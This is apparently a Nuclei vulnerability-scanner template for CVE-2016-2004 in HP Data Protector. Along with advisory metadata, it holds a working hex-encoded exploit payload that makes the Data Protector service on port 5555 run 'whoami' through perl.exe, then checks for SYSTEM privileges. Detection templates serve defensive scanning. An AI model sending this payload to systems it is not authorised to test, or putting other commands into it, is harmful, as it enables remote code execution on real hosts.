id: CVE-2016-2004 info: name: HP Data Protector - Arbitrary Command Execution author: pussycat0x severity: critical description: HPE Data Protector before 7.03_108, 8.x before 8.15, and 9.x before 9.06 allow remote attackers to execute arbitrary code via unspecified vectors related to lack of authentication. This vulnerability exists because of an incomplete fix for CVE-2014-2623. impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands with the privileges of the Data Protector service account. remediation: | Upgrade to the most recent version of HP Data Protector. reference: - https://www.exploit-db.com/exploits/39858 - https://nvd.nist.gov/vuln/detail/CVE-2016-2004 - http://www.kb.cert.org/vuls/id/267328 - https://www.exploit-db.com/exploits/39858/ - http://packetstormsecurity.com/files/137199/HP-Data-Protector-A.09.00-Command-Execution.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2016-2004 cwe-id: CWE-306 epss-score: 0.12552 epss-percentile: 0.95291 cpe: cpe:2.3:a:hp:data_protector:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: hp product: data_protector tags: packetstorm,cve,cve2016,network,iot,hp,rce,edb tcp: - host: - "{{Hostname}}" - "{{Host}}:5555" inputs: - data: "00000034320001010101010100010001000100010100203238005c7065726c2e65786500202d6573797374656d282777686f616d69272900" # whoami type: hex matchers: - type: word encoding: hex words: - "00000034fffe3900000020006e007400200061007500740068006f0072006900740079005c00730079007300740065006d000a0000000000" # authority\system # digest: 490a0046304402206d2e150b2860c337d1b770f858e09818afab03165c95f399e6319d43f20ef948022061e1ffdbea044dce1fe9ca07383c03f6758d2ec7fee9b5549ba80a1c73f2314a:922c64590222798bb761d5b6d8e72950